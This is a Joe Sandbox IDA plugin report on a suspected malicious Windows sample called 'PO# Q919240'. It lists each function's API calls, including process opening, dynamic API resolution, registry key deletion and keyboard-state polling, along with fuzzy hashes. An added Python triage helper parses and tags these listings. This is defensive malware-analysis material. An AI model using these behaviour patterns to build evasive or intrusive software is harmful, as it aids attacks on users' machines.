                • Associated: 00000000.00000002.1466482365.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466506777.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466526085.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466544591.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466544591.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466574073.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO# Q919240.jbxd
                Similarity
                • API ID: ItemMenu$Info_wcslen$Default_malloc_wcscpy
                • String ID: 0
                • API String ID: 621800784-4108050209
                • Opcode ID: ba56779765e6f71d67f6246429d0af9e67b9def047912433c0c15b7e926c8fa5
                • Instruction ID: 8916cda2fcff4f3da81aa675480f1736598f59ba0f795e6899437ff2d0190f01
                • Opcode Fuzzy Hash: ba56779765e6f71d67f6246429d0af9e67b9def047912433c0c15b7e926c8fa5
                • Instruction Fuzzy Hash: E061EDB1604301AAD710EF69D885B6B77A4AF99315F04493FF98087292E7BCD84CC79B
                APIs
                  • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                  • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                • SetErrorMode.KERNEL32 ref: 004781CE
                • SetErrorMode.KERNEL32(00000000,00000001,00000000), ref: 00478387
                  • Part of subcall function 00433998: GetFileAttributesW.KERNEL32(?), ref: 0043399F
                • SetErrorMode.KERNEL32(?), ref: 00478270
                • SetErrorMode.KERNEL32(?), ref: 00478340
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1466419994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1466373991.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466482365.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466506777.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466526085.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466544591.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466544591.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466574073.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO# Q919240.jbxd
                Similarity
                • API ID: ErrorMode$AttributesFile_memmove_wcslen
                • String ID: \VH
                • API String ID: 3884216118-234962358
                • Opcode ID: 178592a45c440348c39a3b7bd59973aab5981f95bb0f1257baca06643fcd57b5
                • Instruction ID: 3f1cdca54a202f1bd1938e87a451cd9606667cca5306a7eaf6ab6c0a6d737147
                • Opcode Fuzzy Hash: 178592a45c440348c39a3b7bd59973aab5981f95bb0f1257baca06643fcd57b5
                • Instruction Fuzzy Hash: F9619F715043019BC310EF25C585A5BB7E0BFC8708F04896EFA996B392CB76ED45CB96
                APIs
                • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00448539
                • IsMenu.USER32(?), ref: 0044854D
                • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 0044859B
                • DrawMenuBar.USER32 ref: 004485AF
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1466419994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1466373991.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466482365.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466506777.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466526085.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466544591.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466544591.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466574073.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO# Q919240.jbxd
                Similarity
                • API ID: Menu$Item$DrawInfoInsert
                • String ID: 0
                • API String ID: 3076010158-4108050209
                • Opcode ID: 1799694fe08fa7a149e3e917ddeca428ef12783b8609c92dee7a023332204936
                • Instruction ID: 7b58e0297b022ec9ba855d833b0382692745775969200e6848d17b537ef0d45f
                • Opcode Fuzzy Hash: 1799694fe08fa7a149e3e917ddeca428ef12783b8609c92dee7a023332204936
                • Instruction Fuzzy Hash: 1F417975A00209AFEB10DF55D884B9FB7B5FF59300F14852EE9059B390DB74A845CFA8
                APIs
                  • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                  • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                • SendMessageW.USER32(?,00000188,00000000,00000000), ref: 00469D69
                • SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 00469D7C
                • SendMessageW.USER32(?,00000189,00000000,00000000), ref: 00469DAC
                  • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                  • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1466419994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1466373991.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466482365.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466506777.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466526085.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466544591.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466544591.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466574073.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO# Q919240.jbxd
                Similarity
                • API ID: MessageSend$_memmove_wcslen
                • String ID: ComboBox$ListBox
                • API String ID: 1589278365-1403004172
                • Opcode ID: 4395ff4c2c8cdf0c8fa99ec605851f177d12593d5a8a66f2884a0b9051c55526
                • Instruction ID: b025c67d46b61e1fa51b41144ded2117d8c1ab71acdc4e5cb50a5164a05e923b
                • Opcode Fuzzy Hash: 4395ff4c2c8cdf0c8fa99ec605851f177d12593d5a8a66f2884a0b9051c55526
                • Instruction Fuzzy Hash: 8D31287160010477DB10BB69CC45BEF775C9F86324F10852FF918AB2D1DABC9E4583A6
                APIs
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1466419994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1466373991.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466482365.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466506777.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466526085.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466544591.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466544591.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466574073.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO# Q919240.jbxd
                Similarity
                • API ID: Handle
                • String ID: nul
                • API String ID: 2519475695-2873401336
                • Opcode ID: efdaae6ab43bf4356d88622121a7e42c7f624cc6de1d12637521731ec53ca4c5
                • Instruction ID: 058e2060cb23de8d889deff533ab301820a4ae088d702658d54b05e79d5a48de
                • Opcode Fuzzy Hash: efdaae6ab43bf4356d88622121a7e42c7f624cc6de1d12637521731ec53ca4c5
                • Instruction Fuzzy Hash: 84319571500204ABEB20DF68DC46BEB77A8EF04721F104A4EFD50973D1E7B59A50CBA5
                APIs
                • GetStdHandle.KERNEL32(000000F6), ref: 0044337D
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1466419994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1466373991.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466482365.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466506777.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466526085.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466544591.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466544591.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466574073.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO# Q919240.jbxd
                Similarity
                • API ID: Handle
                • String ID: nul
                • API String ID: 2519475695-2873401336
                • Opcode ID: 97b946d9a765a46b1e85699804a5cf49c651f34dfecb3a2317456e71fe30ed78
                • Instruction ID: 7fb8f1e98e57093f7bc771e71f756598ee5282d4f5ffeaa4ddc08f3ab3272662
                • Opcode Fuzzy Hash: 97b946d9a765a46b1e85699804a5cf49c651f34dfecb3a2317456e71fe30ed78
                • Instruction Fuzzy Hash: 05219331600204ABE720DF689C49FAB77A8EF55731F20474EFDA0972D0EBB59A50C795
                APIs
                • LoadStringW.USER32(?,00000065,?,0000007F), ref: 0042723B
                  • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                  • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                • _wcsncpy.LIBCMT ref: 00401C41
                • _wcscpy.LIBCMT ref: 00401C5D
                • Shell_NotifyIconW.SHELL32(00000001,?), ref: 00401C6F
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1466419994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1466373991.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466482365.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466506777.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466526085.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466544591.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466544591.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466574073.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO# Q919240.jbxd
                Similarity
                • API ID: IconLoadNotifyShell_String_memmove_wcscpy_wcslen_wcsncpy
                • String ID: Line:
                • API String ID: 1874344091-1585850449
                • Opcode ID: 71d679a4a9352c46b300ee00bac0ebd609a16659c7848ecadc14a4878baa23f7
                • Instruction ID: 22c0e507134e40740d6fd31dbafdd21c3b8ff828be9a92102ab360472f74cad7
                • Opcode Fuzzy Hash: 71d679a4a9352c46b300ee00bac0ebd609a16659c7848ecadc14a4878baa23f7
                • Instruction Fuzzy Hash: EB31A1715083459BD320EB61DC45BDA77E8BF85318F04093EF588931E1E7B8AA49C75E
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1466419994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1466373991.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466482365.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466506777.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466526085.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466544591.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466544591.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466574073.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO# Q919240.jbxd
                Similarity
                • API ID:
                • String ID: SysAnimate32
                • API String ID: 0-1011021900
                • Opcode ID: 8caf53187f6e77aecacb49307b2e697766faa1bc511b1160dce697a174d3407c
                • Instruction ID: b1a10ecfd0a3fc3d2af2854cd73c9de1262d8b9fd4b2252518a975ef6c54cff1
                • Opcode Fuzzy Hash: 8caf53187f6e77aecacb49307b2e697766faa1bc511b1160dce697a174d3407c
                • Instruction Fuzzy Hash: 0D21C975600205ABFB149EA9EC81FAB73DCEB95324F20471BF711972C0D279EC518768
                APIs
                  • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                  • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                  • Part of subcall function 0043646A: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 00436489
                  • Part of subcall function 0043646A: GetWindowThreadProcessId.USER32(?,00000000), ref: 0043649C
                  • Part of subcall function 0043646A: GetCurrentThreadId.KERNEL32 ref: 004364A3
                  • Part of subcall function 0043646A: AttachThreadInput.USER32(00000000), ref: 004364AA
                • GetFocus.USER32 ref: 0046157B
                  • Part of subcall function 004364B5: GetParent.USER32(?), ref: 004364C3
                  • Part of subcall function 004364B5: GetParent.USER32(?), ref: 004364CF
                • GetClassNameW.USER32(?,?,00000100), ref: 004615C4
                • EnumChildWindows.USER32(?,Function_00045B98,?), ref: 004615EF
                • __swprintf.LIBCMT ref: 00461608
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1466419994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1466373991.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466482365.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466506777.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466526085.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466544591.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466544591.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466574073.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO# Q919240.jbxd
                Similarity
                • API ID: Thread$Parent$AttachChildClassCurrentEnumFocusInputMessageNameProcessSendTimeoutWindowWindows__swprintf_memmove_wcslen
                • String ID: %s%d
                • API String ID: 2645982514-1110647743
                • Opcode ID: 964dbc2a73d3b51658c129c0940897b8911b785c40af9afe88b96a44e5c449bd
                • Instruction ID: 8eac61321038dbd32bfe14263504560db7c98c8fbeeeb2eb49a46d34c9d63f73
                • Opcode Fuzzy Hash: 964dbc2a73d3b51658c129c0940897b8911b785c40af9afe88b96a44e5c449bd
                • Instruction Fuzzy Hash: 272180756007096BD610AF69DC89FAF73A8FB88704F00841FF918A7241DAB8A9418B69
                Memory Dump Source
                • Source File: 00000000.00000002.1466419994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1466373991.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466482365.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466506777.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466526085.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466544591.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466544591.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466574073.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO# Q919240.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 0beeaaa579c9339ee211e6c40176bce708d39a94b7630d2852c1f2343b6e5e4f
                • Instruction ID: b0f148a0463f8e77612455c4d0488571574065cadd758f34d18f988e9301810f
                • Opcode Fuzzy Hash: 0beeaaa579c9339ee211e6c40176bce708d39a94b7630d2852c1f2343b6e5e4f
                • Instruction Fuzzy Hash: 2A819F74600604BFEB24CF95C994FBB7B68EF59350F10804EF8959B341E6B8AC45CB6A
                APIs
                • GetCurrentProcessId.KERNEL32(?), ref: 0047584D
                • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 0047585B
                • GetProcessIoCounters.KERNEL32(00000000,?), ref: 0047587F
                • CloseHandle.KERNEL32(00000000), ref: 00475A4D
                Memory Dump Source
                • Source File: 00000000.00000002.1466419994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1466373991.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466482365.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466506777.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466526085.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466544591.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466544591.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466574073.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO# Q919240.jbxd
                Similarity
                • API ID: Process$CloseCountersCurrentHandleOpen
                • String ID:
                • API String ID: 3488606520-0
                • Opcode ID: ce4ed15879a0d4705bc9675b55154bd71a0022cbb1f9dd3a70cee976304ba055
                • Instruction ID: 747e8e91012d04cc7bcfbda4f2b49d0ca9967bea8b965680eccea6cdbc9dea0c
                • Opcode Fuzzy Hash: ce4ed15879a0d4705bc9675b55154bd71a0022cbb1f9dd3a70cee976304ba055
                • Instruction Fuzzy Hash: 82817170A047029FD310DF65C981B4BBBE1BF84704F10892EF6999B3D2DA75E944CB96
                APIs
                  • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                  • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0046B5B5
                Memory Dump Source
                • Source File: 00000000.00000002.1466419994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1466373991.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466482365.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466506777.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466526085.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466544591.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466544591.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466574073.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO# Q919240.jbxd
                Similarity
                • API ID: ConnectRegistry_memmove_wcslen
                • String ID:
                • API String ID: 15295421-0
                • Opcode ID: d8d3d6a2cecaed762a510ed52f320a3b4f5546c74b9e94ec6e10ba7928b5d5b3
                • Instruction ID: 481e56be03c4cee60d8ca92471cfa4b3875eab78bcfcbf7fb961631f720e0f99
                • Opcode Fuzzy Hash: d8d3d6a2cecaed762a510ed52f320a3b4f5546c74b9e94ec6e10ba7928b5d5b3
                • Instruction Fuzzy Hash: 7D515F71208301ABD304EF65C885E5BB7A8FF88704F10892EB54597291D774E945CBA6
                APIs
                • LoadLibraryW.KERNEL32(00000000,?,?,?), ref: 0046485D
                • GetProcAddress.KERNEL32(?,?), ref: 004648F7
                • GetProcAddress.KERNEL32(?,00000000), ref: 00464916
                • GetProcAddress.KERNEL32(?,?), ref: 0046495A
                • FreeLibrary.KERNEL32(?,?,?,?), ref: 0046497C
                Memory Dump Source
                • Source File: 00000000.00000002.1466419994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1466373991.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466482365.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466506777.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466526085.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466544591.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466544591.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466574073.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO# Q919240.jbxd
                Similarity
                • API ID: AddressProc$Library$FreeLoad
                • String ID:
                • API String ID: 2449869053-0
                • Opcode ID: 178b694003ef1c8c6ddf6c03964e3c93f4f33891ff2eeadba8088ba5e41252f8
                • Instruction ID: 8919579e2c9fc9b2d94c4928dd3202a5bdd7863bc063e44bf2a6fba2f1eed130
                • Opcode Fuzzy Hash: 178b694003ef1c8c6ddf6c03964e3c93f4f33891ff2eeadba8088ba5e41252f8
                • Instruction Fuzzy Hash: 2351BF756002049FCB00EFA4C985A9EB7B4EF88304F14856EFD05AB392DB79ED45CB99
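The records in this section list each function's imports with arguments shown as raw hex: OpenProcess(00000410,...) at 0047585B, the LoadLibraryW, three GetProcAddress and FreeLibrary calls at 0046485D to 0046497C, and the RegEnumKeyExW / RegOpenKeyExW / RegDeleteKeyW loop at 00441CA9 to 00441D6E. The Python helper below is an added example and is not part of the Joe Sandbox report or its IDA plugin: it parses these "APIs" listings, decodes the constants it recognises (0x410 is PROCESS_VM_READ | PROCESS_QUERY_INFORMATION; 0x188, 0x189 and 0x18A in the SendMessageW calls at 00469D69 to 00469DAC are LB_GETCURSEL, LB_GETTEXT and LB_GETTEXTLEN) and tags API sequences such as LoadLibrary plus GetProcAddress. The sample input is constructed from four records of this report; the tag names, the constant tables and the regular expressions are this helper's own assumptions about the report layout.

```python
import re

# Added triage helper, not part of the Joe Sandbox report or its IDA plugin: it parses the
# per-function "APIs" listings, decodes Win32 constants the report shows only as hex and
# tags call sequences worth a second look. The tag names and the tables below are ours.

# Constructed sample: four "APIs" listings copied from this report, each ending with the
# record's "API ID" line, which we use as the record label.
SAMPLE = """\
APIs
• GetCurrentProcessId.KERNEL32(?), ref: 0047584D
• OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 0047585B
• GetProcessIoCounters.KERNEL32(00000000,?), ref: 0047587F
• CloseHandle.KERNEL32(00000000), ref: 00475A4D
• API ID: Process$CloseCountersCurrentHandleOpen
APIs
• LoadLibraryW.KERNEL32(00000000,?,?,?), ref: 0046485D
• GetProcAddress.KERNEL32(?,?), ref: 004648F7
• GetProcAddress.KERNEL32(?,00000000), ref: 00464916
• GetProcAddress.KERNEL32(?,?), ref: 0046495A
• FreeLibrary.KERNEL32(?,?,?,?), ref: 0046497C
• API ID: AddressProc$Library$FreeLoad
APIs
• RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,?), ref: 00441CA9
• RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00441CDD
• RegCloseKey.ADVAPI32(?), ref: 00441CFE
• RegDeleteKeyW.ADVAPI32(?,?), ref: 00441D40
• RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 00441D6E
• API ID: Enum$CloseDeleteOpen
APIs
• LoadStringW.USER32(?,00000065,?,0000007F), ref: 0042723B
  • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
• Shell_NotifyIconW.SHELL32(00000001,?), ref: 00401C6F
• API ID: IconLoadNotifyShell_String_memmove_wcscpy_wcslen_wcsncpy
"""

CALL_RE = re.compile(  # "[Part of subcall function X:] Api.MODULE[(args)], ref: X"
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-F]{8}):\s*)?"
    r"(?P<api>[\w$@]+)\.(?P<mod>[\w$]+)(?:\((?P<args>[^)]*)\))?\s*,?\s*ref:\s*(?P<ref>[0-9A-F]{8})")
API_ID_RE = re.compile(r"^\s*•\s*API ID:\s*(?P<id>.*)$")

PROCESS_ACCESS = {  # OpenProcess desired-access bits (winnt.h)
    0x0001: "PROCESS_TERMINATE", 0x0002: "PROCESS_CREATE_THREAD", 0x0008: "PROCESS_VM_OPERATION",
    0x0010: "PROCESS_VM_READ", 0x0020: "PROCESS_VM_WRITE", 0x0040: "PROCESS_DUP_HANDLE",
    0x0400: "PROCESS_QUERY_INFORMATION", 0x1000: "PROCESS_QUERY_LIMITED_INFORMATION"}
NAMED_ARGS = {  # (api, zero-based arg index) -> {value: name}; only values this section shows
    ("SendMessageW", 1): {0x188: "LB_GETCURSEL", 0x189: "LB_GETTEXT", 0x18A: "LB_GETTEXTLEN",
                          0x1074: "LVM_SETITEMTEXTW"},
    ("GetStdHandle", 0): {0xF6: "STD_INPUT_HANDLE"},  # -10; the report prints its low byte
    ("Shell_NotifyIconW", 0): {0: "NIM_ADD", 1: "NIM_MODIFY", 2: "NIM_DELETE"}}
PATTERNS = {  # tag -> API-name prefixes that must all occur in the same function
    "dynamic-api-resolution": ("LoadLibrary", "GetProcAddress"),
    "registry-key-deletion": ("RegEnumKeyEx", "RegDeleteKey"),
    "process-handle-open": ("OpenProcess",)}

def parse_records(text):
    """One record per 'APIs' heading: its label and the parsed call lines (subcalls included)."""
    records, current = [], None
    for line in text.splitlines():
        if line.strip() == "APIs":
            current = {"api_id": "", "calls": []}
            records.append(current)
        elif current is None:
            continue
        elif (m := CALL_RE.match(line)):
            current["calls"].append({"api": m["api"], "module": m["mod"], "ref": m["ref"],
                                     "subcall": m["sub"],
                                     "args": [a for a in (m["args"] or "").split(",") if a]})
        elif (m := API_ID_RE.match(line)):
            current["api_id"] = m["id"].strip()
    return records

def decode_access_mask(mask):
    names = [name for bit, name in PROCESS_ACCESS.items() if mask & bit]
    if rest := mask & ~sum(PROCESS_ACCESS):
        names.append(f"0x{rest:X}")
    return "|".join(names) or "0"

def decode_args(call):
    """Hex arguments become 0x... plus a name where known; '?' and symbolic refs stay as-is."""
    out = []
    for i, raw in enumerate(call["args"]):
        if not re.fullmatch(r"[0-9A-Fa-f]{1,8}", raw):
            out.append(raw)
            continue
        value = int(raw, 16)
        name = (decode_access_mask(value) if (call["api"], i) == ("OpenProcess", 0)
                else NAMED_ARGS.get((call["api"], i), {}).get(value))
        out.append(f"0x{value:X} ({name})" if name else f"0x{value:X}")
    return out

def flag_patterns(record):
    # Tags from PATTERNS over the function's own (non-subcall) API names.
    apis = [c["api"] for c in record["calls"] if not c["subcall"]]
    return [tag for tag, prefixes in PATTERNS.items()
            if all(any(a.startswith(p) for a in apis) for p in prefixes)]

def triage(text):
    # Per record: label, tags, and each call rendered with decoded arguments.
    return [{"api_id": r["api_id"], "flags": flag_patterns(r),
             "calls": [f"{c['api']}({', '.join(decode_args(c))}) @{c['ref']}" for c in r["calls"]]}
            for r in parse_records(text)]
```

Feed it the saved text of a report (triage(open("report.txt", encoding="utf-8").read())) and read the tagged records first. The tags are pointers, not verdicts: resolving imports through LoadLibrary and GetProcAddress is also how ordinary runtimes load optional APIs, so the function at 0046485D has to be read in context, and anything the report prints as "?" was not known statically and is left exactly as shown.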
                APIs
                • GetCursorPos.USER32(?), ref: 004563A6
                • ScreenToClient.USER32(?,?), ref: 004563C3
                • GetAsyncKeyState.USER32(?), ref: 00456400
                • GetAsyncKeyState.USER32(?), ref: 00456410
                • GetWindowLongW.USER32(?,000000F0), ref: 00456466
                Memory Dump Source
                • Source File: 00000000.00000002.1466419994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1466373991.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466482365.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466506777.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466526085.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466544591.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466544591.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466574073.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
